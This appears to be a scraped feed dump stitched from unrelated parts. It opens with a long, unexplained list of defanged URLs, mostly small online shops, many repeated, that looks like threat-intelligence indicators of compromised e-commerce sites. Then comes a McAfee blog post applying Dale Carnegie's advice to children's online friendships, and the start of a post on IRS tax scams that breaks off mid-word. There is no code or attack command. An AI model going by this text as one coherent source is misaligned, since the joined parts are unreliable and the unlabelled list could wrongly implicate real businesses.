URL: https://www.]kitauto.]pt/
URL: http://dhyanaa.]com/
URL: http://magescore.]com/
URL: http://www.]officecorrect.]com/
URL: https://www.]tec-heads.]com/
URL: http://bagsymalone.]in/
URL: http://philippelebac.]fr/
URL: http://www.]fashionaxe.]com/
URL: http://mehtagems.]com/
URL: http://www.]qdp.]com/
URL: https://www.]khadiindia.]in/
URL: https://goodprice.]net/customer/account/login
URL: http://www.]matexbuyer.]com/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: https://www.]khadiindia.]in/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: https://magesource.]su/
URL: http://www.]minopuntomoda.]com/
URL: http://fashionavenue.]ma/
URL: http://www.]khadioutlet.]com/
URL: http://hotelcathedrale.]be/
URL: https://magesource.]su/
URL: http://hotelcathedrale.]be/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://hotelcathedrale.]be/
URL: http://gemastrology.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://www.]airckmoaw.]com/
URL: http://www.]kevinbuou.]com/
URL: http://www.]fiskrose.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]matexbuyer.]com/
URL: http://hotelcathedrale.]be/
URL: http://jacksvapes.]com/
URL: http://garudakart.]com/
URL: http://www.]bowtiqueuk.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]matexbuyer.]com/
URL: https://goodprice.]net/customer/account/login
URL: http://hotelcathedrale.]be/
URL: https://www.]khadiindia.]in/
URL: http://www.]qdp.]com/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]myvanaccessories.]co.]uk/
URL: https://www.]ezy-care.]co.]uk/
URL: http://mehtagems.]com/
URL: http://www.]myengineoil.]co.]uk/
URL: http://hotelcathedrale.]be/
URL: http://www.]mynumberplates.]com/
URL: http://www.]britoil.]co.]uk/
URL: http://www.]mywiperblades.]co.]uk/
URL: http://www.]fashionaxe.]com/
URL: http://philippelebac.]fr/
URL: http://hotelcathedrale.]be/
URL: http://bagsymalone.]in/
URL: https://www.]tec-heads.]com/
URL: http://www.]bowtiqueuk.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]officecorrect.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://magescore.]com/
URL: http://dhyanaa.]com/
URL: https://www.]kitauto.]pt/
URL: http://hotelcathedrale.]be/
URL: http://motornets.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]ewrjuant.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]repkcory.]com/
URL: http://www.]supritam.]com/
URL: http://www.]matexbuyer.]com/
URL: http://www.]blazovic.]com/
URL: http://hotelcathedrale.]be/
URL: https://www.]kitauto.]pt/
URL: http://hotelcathedrale.]be/
URL: http://stonemanasia.]com/
URL: http://stonemanasia.]com/
URL: http://stonemanasia.]com/
URL: http://stonemanasia.]com/
URL: http://hotelcathedrale.]be/
URL: http://magescore.]com/
URL: http://falcontraders.]co.]uk/
URL: http://designbookshop.]in/
URL: http://hotelcathedrale.]be/
URL: http://www.]mslzaric.]com/
URL: http://www.]clairnewt.]com/
URL: https://www.]denimvenim.]com/
URL: http://www.]coslflybiod.]com/
URL: http://www.]mirnkola.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: https://www.]solaroutdoorlightingdisplay.]com/
URL: http://www.]airckmoaw.]com/
URL: http://doctor-alcrimea.]ru/
URL: https://herbaloja.]online/
URL: http://pharmatrades.]com/
URL: http://www.]nadiarey.]com/
URL: http://coitoys.]com/
URL: http://oculosdahora.]com.]br/
URL: http://om10.]ru/
URL: http://www.]treosportswear.]com/
URL: http://shopgbpi.]co.]uk/
URL: https://www.]niwuma.]com/
URL: http://www.]hoaquathanhhang.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]farmcraft.]at/
URL: http://bookmyo.]com/
URL: http://masterlyweft.]com/
URL: http://store.]uggtasman.]com.]au/
URL: http://www.]bukserhe.]com/
URL: http://smallpenfactory.]com.]au/
URL: http://www.]autocleaningbrunssum.]nl/
URL: http://www.]laboutiqueachapeaux.]com/
URL: http://batubati.]hu/
URL: http://demolicaomoveis.]com.]br/
URL: http://www.]superdin.]com.]br/
URL: http://www.]tonyonlinestore.]com/
URL: http://www.]descontosemhoteis.]com.]br/
URL: http://garudakart.]com/
URL: http://jutebazaar.]com/
URL: http://www.]leilachodo.]com/
URL: http://newstudytour.]com/
URL: http://www.]zamarimarcondes.]com.]br/
URL: http://fisiolifepilates.]com.]br/
URL: https://dload.]com.]br/
URL: http://hotelcathedrale.]be/
URL: http://kiiroousa.]com/
URL: http://designbookshop.]in/
URL: http://hotelcathedrale.]be/
URL: https://www.]baleyo.]com/
URL: http://store.]uggtasman.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://oomph.]com.]sg/
URL: http://hotelcathedrale.]be/
URL: http://www.]mywiperblades.]co.]uk/
URL: http://www.]myengineoil.]co.]uk/
URL: http://www.]britoil.]co.]uk/
URL: http://www.]myvanaccessories.]co.]uk/
URL: https://www.]ezy-care.]co.]uk/
URL: http://english-furniture.]co.]uk/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]matexbuyer.]com/
URL: http://momega.]vn/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://aquasport.]sigmacell.]in/
URL: http://hotelcathedrale.]be/
URL: http://worldstogether.]com/
URL: http://www.]matexbuyer.]com/
URL: https://www.]arenaflorist.]com/
URL: http://www.]blendystraw.]com/
URL: http://hotelcathedrale.]be/
URL: http://only16.]net/
URL: http://hotelcathedrale.]be/
URL: http://www.]pibeauty.]com/~pibeauty/
URL: http://hotelcathedrale.]be/
URL: http://www.]arquegym.]com.]br/
URL: http://hotelcathedrale.]be/
URL: http://momega.]vn/
URL: http://hotelcathedrale.]be/
URL: https://www.]paudicesrl.]it/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]reviewlista.]com/
URL: https://www.]khadiindia.]in/
URL: http://www.]kupu.]es/
URL: http://hotelcathedrale.]be/
URL: https://magesource.]su/
URL: http://www.]nurserydecalsandmore.]com/
URL: http://hotelcathedrale.]be/
URL: http://only16.]net/
URL: http://www.]myvanaccessories.]co.]uk/
URL: http://www.]mynumberplates.]com/
URL: https://myphonetics.]com/
URL: http://www.]myengineoil.]co.]uk/
URL: http://www.]mywiperblades.]co.]uk/
URL: http://www.]opticalsupplies.]com/
URL: https://www.]ezy-care.]co.]uk/
URL: http://www.]britoil.]co.]uk/
URL: http://hotelcathedrale.]be/
URL: http://www.]doftec.]com/
URL: http://garudakart.]com/
URL: http://legalprintllc.]com/
URL: http://lukasandlara.]com/
URL: http://hotelcathedrale.]be/
URL: http://stonemanasia.]com/
URL: http://stonemanasia.]com/
URL: http://hotelcathedrale.]be/
URL: https://myphonetics.]com/
URL: http://alltradeshowdisplay.]com/
URL: http://www.]virmans.]com/
URL: http://www.]gramton.]com/
URL: http://hotelcathedrale.]be/
URL: http://magescore.]com/
URL: http://www.]thevintagegrapes.]com/
URL: http://english-furniture.]co.]uk/
URL: http://stonemanasia.]com/
URL: http://jacksvapes.]com/
URL: http://unsquashaball.]com/
URL: https://www.]eyewear69.]my/
URL: http://www.]vandrugboards.]com/
URL: http://qandmantiqueluxury.]com/
URL: http://hivepackaging.]com/
URL: http://www.]4d-printology.]com/
URL: http://hotelcathedrale.]be/
URL: http://diamondwrapfactory.]com/
URL: http://petanyway.]net/index.%5Dphp/why-not-available/
URL: http://hotelcathedrale.]be/
URL: http://www.]lobsters.]com.]sg/
URL: https://www.]arenaflorist.]com/
URL: http://www.]mrsflorist.]co.]in/
URL: http://www.]loosen-up.]com/
URL: http://labdooshoes.]com/
URL: http://www.]pibeauty.]com/~pibeauty/
URL: http://hotelcathedrale.]be/
URL: https://www.]paudicesrl.]it/
URL: http://hotelcathedrale.]be/
URL: http://eshop.]wengthyelot54.]com/
URL: https://mustardoc.]com/
URL: http://hotelcathedrale.]be/
URL: https://electroshopnow.]com/
URL: http://kmmachinery.]com/
URL: http://kmglasstools.]com/
URL: http://hotelcathedrale.]be/
URL: http://dealelement.]com/
URL: http://www.]matexbuyer.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]xentogo.]com/
URL: http://hotelcathedrale.]be/
URL: http://shoefactoryindia.]com/
URL: http://hotelcathedrale.]be/
URL: http://solarinfrasystems.]com/
URL: https://electroshopnow.]com/
URL: https://www.]macroman.]in/
URL: http://juwelier-tarasek.]de/
URL: https://dourosoptika.]gr/
URL: https://www.]straightfromfarmers.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://www.]uiterkits.]com/
URL: http://de-lices.]ru/
URL: http://hotelcathedrale.]be/
URL: http://store.]uggtasman.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://rpkorea.]com/
URL: https://www.]sellsspares.]com/
URL: http://www.]fashionaxe.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://fenxiangheaven.]com/
URL: http://www.]i91cloud.]com/
URL: https://www.]ikonmotorsports.]com/
URL: https://gorusticx.]com/
URL: http://www.]lobsters.]com.]sg/
URL: http://www.]ororganicliving.]com/
URL: http://www.]lifestylea-list.]com/
URL: http://www.]grovz.]com/
URL: http://diamondwrapfactory.]com/
URL: http://omniscrubs.]com/
URL: http://www.]4d-printology.]com/
URL: http://www.]northhillco.]com/
URL: http://devdantona.]com/
URL: http://deeprosso.]com/
URL: http://www.]fashionaxe.]com/
URL: http://www.]iousi.]com.]cn/
URL: http://hotelcathedrale.]be/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://hotelcathedrale.]be/
URL: http://only16.]net/
URL: http://www.]eurekacosmetics.]com/
URL: http://momega.]vn/
URL: http://hotelcathedrale.]be/
URL: http://www.]virmanishop.]com/
URL: http://goofballstuff.]com/
URL: http://hotelcathedrale.]be/
URL: http://om10.]ru/
URL: http://www.]nurserydecalsandmore.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]baudacarlota.]com.]br/index.%5Dphp
URL: http://www.]baudacarlota.]com.]br/index.%5Dphp%7C
URL: http://www.]baudacarlota.]com.]br/index.%5Dphp
URL: http://www.]baudacarlota.]com.]br/index.%5Dphp%7C
URL: http://hotelcathedrale.]be/
URL: https://www.]ikonmotorsports.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]cityflorist.]co.]in/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://goldwithyou.]com/
URL: http://hotelcathedrale.]be/
URL: https://herbaloja.]online/
URL: http://www.]surprise.]ps/
URL: http://hotelcathedrale.]be/
URL: http://store.]curiousinventor.]com/
URL: http://www.]magento.]flyermonster.]de/
URL: http://hotelcathedrale.]be/
URL: https://deals4kart.]com/
URL: http://academycreative.]cz/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://cuberra.]eu/
URL: http://hotelcathedrale.]be/
URL: https://www.]smclinic.]bg/
URL: http://shoefactoryindia.]com/
URL: http://www.]fiskrose.]com/
URL: https://myworldphone.]com/
URL: https://www.]khadiindia.]in/
URL: http://www.]kevinbuou.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]ajshoes.]top/index.%5Dphp?route=checkout/checkout
URL: https://deals4kart.]com/
URL: http://www.]fangshicube.]com/
URL: http://www.]gpmbv.]com/
URL: http://va-store.]de/
URL: http://www.]webshopsmagento.]nl/
URL: http://jewelsofdesert.]com/
URL: http://www.]khadioutlet.]com/
URL: http://lequeens.]com/
URL: http://stilprinzessin.]com/
URL: http://www.]doreall.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]fangshicube.]com/
URL: http://luggagemama.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://cyprusitstore.]com/
URL: https://deals4kart.]com/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]ajshoes.]top/index.%5Dphp?route=checkout/checkout
URL: http://hotelcathedrale.]be/
URL: http://www.]myvanaccessories.]co.]uk/
URL: http://www.]arquegym.]com.]br/
URL: http://www.]britoil.]co.]uk/
URL: http://hotelcathedrale.]be/
URL: https://www.]chirobuddy.]net/
URL: http://hotelcathedrale.]be/
URL: http://www.]electricalswholesale.]co.]uk/
URL: http://www.]matexbuyer.]com/
URL: http://www.]webshopsmagento.]nl/
URL: https://www.]straightfromfarmers.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://www.]doreall.]com/
URL: https://pinkime.]com/
URL: https://www.]websun.]us/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://store.]curiousinventor.]com/guides/Surface_Mount_Soldering/Tools
URL: http://www.]electricalswholesale.]co.]uk/
URL: http://momega.]vn/
URL: http://hotelcathedrale.]be/
URL: http://magesource.]su/
URL: http://magesource.]su/
URL: http://magesource.]su/
URL: http://only16.]net/
URL: http://labdooshoes.]com/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://om10.]ru/
URL: http://lequeens.]com/
URL: http://www.]athleticmmagear.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]almosauto.]in/
URL: http://douspeakgreen.]in/
URL: http://www.]eurekacosmetics.]com/
URL: http://hotelcathedrale.]be/
URL: http://coripa.]net/
URL: http://hotelcathedrale.]be/
URL: http://www.]tribalasia.]com.]my/
URL: http://hotelcathedrale.]be/
URL: https://www.]xinginroo.]com/
URL: http://magesource.]su/
URL: https://www.]khadiindia.]in/
URL: http://www.]supritam.]com/
URL: http://magesource.]su/
URL: http://store.]curiousinventor.]com/
URL: http://www.]blendystraw.]com/
URL: http://www.]barcoderfidstore.]com/
URL: http://douspeakgreen.]in/
URL: http://fashionfromla.]com/
URL: http://seasonallivingokc.]com/
URL: http://floorzndoorz.]com/
URL: http://formula-depot.]com/
URL: http://zigoh.]com/
URL: https://www.]baleyo.]com/
URL: http://luggagemama.]com/
URL: http://magesource.]su/
URL: http://hotelcathedrale.]be/
URL: http://emediks.]com/store/
URL: http://www.]fashionaxe.]com/
URL: http://schrikdraad.]nu/
URL: http://www.]liquidfillingpastefilling.]com/
URL: http://hotelcathedrale.]be/
URL: http://bymatty.]com/
URL: http://www.]sclabrine.]com/
URL: https://www.]bluecactus.]co/
URL: http://fashionavenue.]ma/
URL: http://yesforlov.]sk/
URL: https://vytunuj.]sk/
URL: http://www.]nflskjor.]com/
URL: http://www.]acolortree.]com/
URL: https://cobrafashions.]com/
URL: http://www.]wondershop.]in/
URL: http://sockitupsocks.]com/
URL: http://richbumlife.]com/
URL: http://gypsygfashionaccessories.]com/
URL: https://www.]bvsecurity.]com/
URL: http://www.]fiskrose.]com/
URL: https://espacomanix.]com.]br/
URL: http://www.]nixim3dpuzzle.]com/
URL: http://www.]almosauto.]in/
URL: http://www.]mage-apps.]de/
URL: http://budstok.]com.]ua/
URL: http://stage.]citizencashmere.]com/
URL: http://www.]nitazdesign.]com/
URL: http://goldwithyou.]com/
URL: http://chkmaid.]com/
URL: http://www.]mattiaus.]com/
URL: http://www.]hcgsci.]com/
URL: http://eshop.]wengthyelot54.]com/
URL: http://bartonwest.]com/
URL: http://gravurator.]de/
URL: http://platz.]com.]ua/
URL: https://5eboard.]com/
URL: http://khadder.]in/
URL: https://novnation.]com/
URL: https://www.]taptye.]com/
URL: https://seelar.]com/
URL: http://www.]1quickcomp.]com/
URL: http://pinul.]com/
URL: http://www.]99materials.]com/
URL: http://southernvapor.]com/
URL: http://www.]pejenterprisesinc.]com/
URL: http://www.]ejoyeeta.]com/
URL: http://www.]retailsigningsolutions.]com/
URL: http://www.]fyringe.]com/
URL: http://www.]suninbox.]co.]uk/
URL: http://www.]gohoyo.]com/
URL: http://eveday.]com/
URL: https://www.]el-taller.]pe/
URL: https://www.]dazzstyle.]com/
URL: http://montecitocaviar.]com/
URL: http://www.]togotelecom.]ca/
URL: http://swimresearch.]com/
URL: https://eighteditions.]com/
URL: https://srmall.]net/
URL: https://hyperstrength.]com/
URL: https://www.]gardenarteu.]com/
URL: http://deltanineclothing.]com/
URL: http://www.]storerab.]com/
URL: http://floorzndoorz.]com/
URL: http://4girlsaccessories.]com/
URL: http://www.]cityflorist.]co.]in/
URL: http://faithandflags.]com/
URL: https://www.]theaugustco.]com/
URL: http://francomotorsports.]com/
URL: http://www.]reviewlista.]com/
URL: http://www.]luckystarparty.]com/
URL: http://www.]interprice.]mx/
URL: http://www.]xxlgrip.]com/
URL: http://avstamps.]com/
URL: https://www.]baleyo.]com/
URL: http://www.]905wood.]com/
URL: https://www.]macroman.]in/
URL: http://cuberra.]eu/
URL: https://www.]velmo.]com/
URL: https://wonderna.]com/
URL: http://www.]spectrumlites.]co.]in/
URL: http://kupi-present.]ru/
URL: http://plumbedright.]com/
URL: http://equibuy.]es/
URL: https://www.]tec-heads.]com/
URL: http://advancehealthproducts.]com.]au/
URL: http://www.]inflatable-zone.]org/
URL: https://dermagold.]sg/
URL: http://www.]ibericos.]es/
URL: http://worldstogether.]com/
URL: http://www.]reflect-store.]com/
URL: http://www.]kaajalsarees.]com/
URL: http://www.]arquegym.]com.]br/
URL: http://www.]benzin-im-blut.]com/
URL: http://www.]ladago.]co.]uk/
URL: http://clonadipet.]com.]br/
URL: http://www.]louboutinuk.]co.]uk/
URL: https://onestophairandbeauty.]ie/
URL: http://www.]jensalwholesale.]com/
URL: https://www.]chirobuddy.]net/
URL: http://tile.]tilesandiego.]com/
URL: https://morrio.]com/
URL: http://cadresrobain.]fr/
URL: http://www.]petzy.]com.]au/
URL: http://www.]dysin.]com/
URL: http://buyvipbaby.]com/login/
URL: http://www.]olisano.]com/
URL: http://www.]thevintagegrapes.]com/
URL: http://www.]ludoville.]it/
URL: http://zigoh.]com/
URL: http://usacontainergroup.]com/
URL: https://www.]clinicallearning.]com/index.%5Dphp/
URL: http://www.]farmcraft.]at/
URL: http://www.]poyood.]com/
URL: http://euromigracija.]lt/
URL: http://goofballstuff.]com/
URL: https://www.]enlivenglobal.]com/
URL: http://www.]turyagatea.]com/
URL: http://creekfire.]com/
URL: http://nowknow.]ch/
URL: http://vkconline.]com/
URL: https://trinitysurvival.]com/
URL: http://www.]eboxim.]com/
URL: http://www.]ilovedelfruito.]com/
URL: http://www.]danatsouq.]com/
URL: https://www.]callidae.]com/
URL: https://www.]tramit.]it/
URL: http://jjnc.]com.]hk/
URL: http://shop.]taketime.]ch/
URL: https://lacnehry.]sk/
URL: https://ibercorte.]com/
URL: http://www.]macmax.]com/uk/
URL: http://www.]raquelrecargas.]com.]br/
URL: http://www.]hotsca.]com/
URL: http://www.]jarab.]london/
URL: http://www.]webshopsmagento.]nl/
URL: http://start-finish.]ru/
URL: http://www.]officiel.]it/
URL: http://www.]isbbookstore.]com/
URL: http://www.]krirob.]nu/
URL: http://www.]eurekacosmetics.]com/
URL: http://kupu.]es/
URL: http://en.]lileauxbrocantes.]com/nouveautes.%5Dhtml
URL: http://girlsandpearls.]com/
URL: https://www.]websun.]us/
URL: http://www.]vintageindiarishikesh.]com/
URL: http://piese-gm.]ro/
URL: http://www.]diamondsnyou.]com/
URL: http://ccgobuy.]com/
URL: http://olenobra.]com/
URL: https://www.]eternis.]pt/
URL: http://infcollection.]com/
URL: http://lojamundodosgames.]com/
URL: http://purplebluepublishing.]com/
URL: https://www.]autowheelexperts.]com/
URL: https://www.]gizell.]ro/
URL: http://smalldogsdepot.]com/
URL: http://www.]hessiansantasacks.]co.]uk/
URL: http://laborisfarma.]pl/
URL: http://fashionfromla.]com/
URL: https://www.]sellsspares.]com/
URL: http://www.]soothnshine.]com/
URL: http://jacksvapes.]com/
URL: https://www.]richgromart.]com/
URL: http://www.]safetreksales.]com/
URL: http://ibundo.]de/
URL: http://www.]megamojster.]si/
URL: http://rpkorea.]com/
URL: http://discountadda.]com/
URL: http://www.]enotecaosteriaroma.]it/
URL: http://nopainnomusa.]com/
URL: https://www.]shopforsaundarya.]com/
URL: http://accessoriesdeluxe.]com/
URL: https://www.]krausjeans.]com/
URL: http://www.]ghulamali.]com.]pk/
URL: http://www.]hardshot.]fr/
URL: http://countrystorecampinas.]com.]br/
URL: http://p-d-r.]ru/
URL: http://demo.]freelunchlabs.]com/
URL: http://atopmall.]kr/
URL: http://hurtsilvermagic.]pl/customer/account/login/
URL: https://www.]afsr-simivalley-shop.]com/
URL: http://www.]dutwsnmare.]com/
URL: http://produtosprofissionais.]com.]br/
URL: https://my.]nutis.]com/
URL: https://www.]smclinic.]bg/
URL: https://www.]wisesolutions.]net/
URL: https://davillblinds.]com/
URL: https://minervamedical.]ca/
URL: http://gamsjaga.]com/
URL: https://jceracing.]com/
URL: http://dhyanaa.]com/
URL: https://weloveheipoa.]com/
URL: http://www.]advanced-pixel-shuttle.]com/
URL: http://allright.]dp.]ua/
URL: http://trueitglobal.]com/
URL: http://www.]nandndesign.]com/
URL: http://antaraxnm.]com/
URL: http://www.]petitkreativ.]at/
URL: https://www.]crowngroup.]net.]au/shop/
URL: http://vanquish.]co.]in/
URL: http://www.]esde.]ro/
URL: https://liquidlightglows.]com/
URL: http://shop.]littleashford.]co.]za/
URL: https://lens4us.]com/
URL: https://www.]westernelitejewelry.]com/
URL: http://www.]mobilprices.]com/
URL: http://blitarzoneid.]blogspot.]com/
URL: http://kraftitude.]com/
URL: http://grupocyber.]net/
URL: http://elektro-wols.]kompass-media.]eu/
URL: http://classico.]nextmp.]net/
URL: http://www.]nationaltiledistribution.]com/
URL: http://bloomingtrails.]com/
URL: http://redcellmedical.]com/
URL: http://patesting.]ie/
URL: http://www.]bysicilia.]it/
URL: http://kibellariding.]com/
URL: https://www.]ladoudounesolde.]com/
URL: http://www.]anjelskedarceky.]sk/
URL: https://poolstore.]com.]au/
URL: http://sklepsilvermagic.]pl/
URL: http://www.]uebuys.]com/
URL: http://www.]reynsaon.]com/
URL: http://eshop.]javwireless.]com/
URL: http://alphafxtestbooster.]com/
URL: https://decor-boutique.]com/
URL: http://www.]kevinbuou.]com/
URL: https://www.]aioma.]it/
URL: http://luxuryjewelleryto.]com/
URL: http://www.]angcoshop.]com/
URL: https://www.]vayobv.]com/
URL: http://de-lices.]ru/
URL: https://democanopy.]com/
URL: https://mustardoc.]com/
URL: http://www.]gourmetgallery.]sk/
URL: http://fetchscripts.]com/
URL: http://ballcancersucks.]com/
URL: https://xtremevisionhid.]com/
URL: http://www.]brushncanvas.]com/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://www.]haitralled.]com/
URL: https://hanarovendas.]com.]br/
URL: http://www.]plasticrewards.]com/
URL: http://www.]universalbumpkeys.]com/
URL: http://zuzugadgets.]com/
URL: https://freshyeat.]com/
URL: http://alch.]it/
URL: http://asap.]co.]in/
URL: https://www.]majesticlightinginc.]com/
URL: https://www.]1by1shop.]com/
URL: https://www.]kitauto.]pt/
URL: http://sandoggrus.]dk/
URL: http://www.]shieldmans.]com/
URL: http://zapal.]com.]ua/
URL: https://www.]farmaciabovisa.]it/
URL: http://gurmanebi.]com/
URL: http://www.]sportlowcost.]it/
URL: http://www.]minopuntomoda.]com/
URL: http://mstech.]com.]au/
URL: http://magegaga.]com/
URL: http://www.]matexbuyer.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]pibeauty.]com/~pibeauty/
URL: http://shop-camera.]com/
URL: http://hotelcathedrale.]be/
URL: http://alltradeshowdisplay.]com/
URL: http://hikvision-ir.]com/
URL: http://shop-camera.]com/
URL: http://homelykart.]com/
URL: https://www.]bvsecurity.]com/
URL: http://mebli-z.]com/
URL: https://mustardoc.]com/
URL: https://www.]krausjeans.]com/
URL: http://www.]dutwsnmare.]com/
URL: http://www.]gramton.]com/
URL: http://usacontainergroup.]com/
URL: http://tile.]tilesandiego.]com/
URL: http://bartonwest.]com/
URL: https://www.]dazzstyle.]com/
URL: https://minervamedical.]ca/
URL: http://www.]inflatable-zone.]org/
URL: http://www.]ilovedelfruito.]com/
URL: http://www.]hotsca.]com/
URL: http://www.]uebuys.]com/
URL: http://girlsandpearls.]com/
URL: http://obeikandl.]com/
URL: http://thanhloc1.]com/
URL: http://seasonallivingokc.]com/
URL: https://www.]macroman.]in/
URL: https://www.]petremedies.]co.]uk/
URL: http://www.]hessiansantasacks.]co.]uk/
URL: http://naturagladlife.]com/
URL: http://www.]protezzla-direct.]com/nkc-ledenvoordeel/
URL: https://commercialpoolandspasupplies.]com/
URL: http://www.]sclabrine.]com/
URL: http://www.]quimex.]com.]ar/
URL: http://lojamundodosgames.]com/
URL: http://om10.]ru/
URL: http://www.]webshopsmagento.]nl/
URL: http://www.]suninbox.]co.]uk/
URL: https://www.]vayobv.]com/
URL: http://www.]louboutinuk.]co.]uk/
URL: https://www.]ikonmotorsports.]com/
URL: http://hotelcathedrale.]be/
URL: https://www.]eternis.]pt/
URL: http://www.]arquegym.]com.]br/
URL: http://fetchscripts.]com/
URL: http://petit-univers.]com/
URL: https://www.]krausjeans.]com/
URL: http://store.]uggtasman.]com.]au/
URL: http://ledrus.]co.]nz/
URL: http://obeikandl.]com/
URL: http://hotelcathedrale.]be/
URL: http://net-istore.]ro/
URL: http://www.]mrsflorist.]co.]in/
URL: http://shop-camera.]com/

Timeless Principles to Help Your Child Develop Social Superpowers

online relationships

“You can make more friends in two months by becoming interested in other people than you can in two years by trying to get other people interested in you.” ~ Dale Carnegie

Each year it’s my tradition to re-read a handful of books that continue to shape my perspective. One of those books is the 1936 self-help classic, How to Win Friends and Influence People by Dale Carnegie.

I’ll admit, I’ve never liked the book’s overly-schmoozy title, but its content is gold. And 84 years later, it’s still relevant to our ongoing family discussion of how to model leadership and get a more meaningful return on our digital connections.

Slow down, look around

It has become easy, and almost habitual, to move fast, skim content, and make quick judgments. We upload details about ourselves, our opinions, our activities, our agendas, our wins.

Carnegie’s approach (condensed and paraphrased): Slow down and look around. Take a genuine interest in the people around you. Make room for different points of view. Steer clear of drama, criticizing others, and conflict. And never make anyone feel “less than.”

Social superpowers

Carnegie’s principles, applied online, are tools parents can use to help kids develop their social superpowers. The simple act of slowing down and listening instead of clicking is a big step toward more genuine connections.

On the safety side, slowing down can help kids become more aware of and avoid threats such as cyberbullying, scams, catfishing, and online conflict.

Here are a few more Carnegie power tips (condensed and paraphrased) to help build up your family’s social superpowers.

More meaningful connections

Take a genuine interest in others. “If we want to make friends, let’s do things for other people – things that require time, energy, unselfishness, and thoughtfulness.”

Encourage your child to step out of the “selfie” mindset as a first step in forming more genuine friendships online (as opposed to amassing followers). Brainstorm ways to do this. Maybe it’s more face-to-face time with known friends, keeping track of other people’s birthdays, and hand-writing cards and sending them in the mail. Paying attention to the details of a person’s life — their hobbies, family members, values, and goals — is the heartbeat of a real friendship.

Smile, be welcoming.  “Actions speak louder than words, and a smile says, ‘I like you. You make me happy. I am glad to see you.’”

Sounds simple but a smile — in this case, the way we welcome others online — can go a long way. The attitude we express through our online interactions communicates can make or break our relationships and reputation.

Encourage your child to review and delete negative or harmful content that lacks a spirit of inclusion and kindness. Our social profiles may be the first impression others — including teachers, colleges, and employers — may have of us.

Another plus: Choosing a digital “smile” when we post (over drama and making fun) sends a powerful message that can ease cyberbullying, build empathy, and be a source of strength for others who may be struggling.

Note: Choosing to smile online as a general principle doesn’t include faking it or only sharing a heavily-edited or overly positive version of your life. Be real. Be honest. Be you.

Affirm others. “. . . a sure way to [people’s] hearts is to let them realize in some subtle way that you realize their importance and recognize it sincerely.”

Everyone person on the planet has a fundamental need to be noticed and feel valued. With the amount of anxiety, depression, body image issues, and cyberbullying kids face online, what young person couldn’t use a genuine word of encouragement?

Discuss the many ways to affirm others on and offline. Encourage your child to be aware and willing to complement the strengths of others, cheer on accomplishments, and support a cause or passion they’ve expressed.

Avoid arguments and criticizing others. “Criticism is dangerous because it wounds a person’s precious pride, hurts his [or her] sense of importance, and arouses resentment.”

If we could all master these two Carnegie principles online, the world’s collective mental health might be on a happier, healthier trajectory.

Encourage your child to pay attention to his or her emotions and avoid engaging others if they feel angry, anxious, or tired. Discuss the importance of empathy and forgiveness. Challenge them to allow others to express their ideas without judgment.

Avoiding conflict doesn’t mean you ignore injustice or become a doormat. On the contrary, responding with grace in a tense situation requires strength and self-control — especially when it comes to trolls and bullies.

Carnegie wrote his book during the Great Depression when the practice optimism and simple truths were critical to a person’s hope. So, some perspectives will feel odd or passé. But stick with it. Savor and apply the gems and enjoy the process of deepening your digital connections.

The post Timeless Principles to Help Your Child Develop Social Superpowers appeared first on McAfee Blogs.

Watch Out For IRS Scams and Avoid Identity Theft

It’s time to get those W-2 and 1099 tax forms ready. On January 27th, the IRS began accepting paper and electronic tax returns ahead of the April 15th due date. But as users prepare to file, scammers prepare to take advantage of innocent taxpayers with malicious tactics, looking to harvest the extensive amounts of personal data found in IRS tax documents. Let’s take a look at common tactics hackers may leverage this tax season.

Impersonation Schemes

A commonl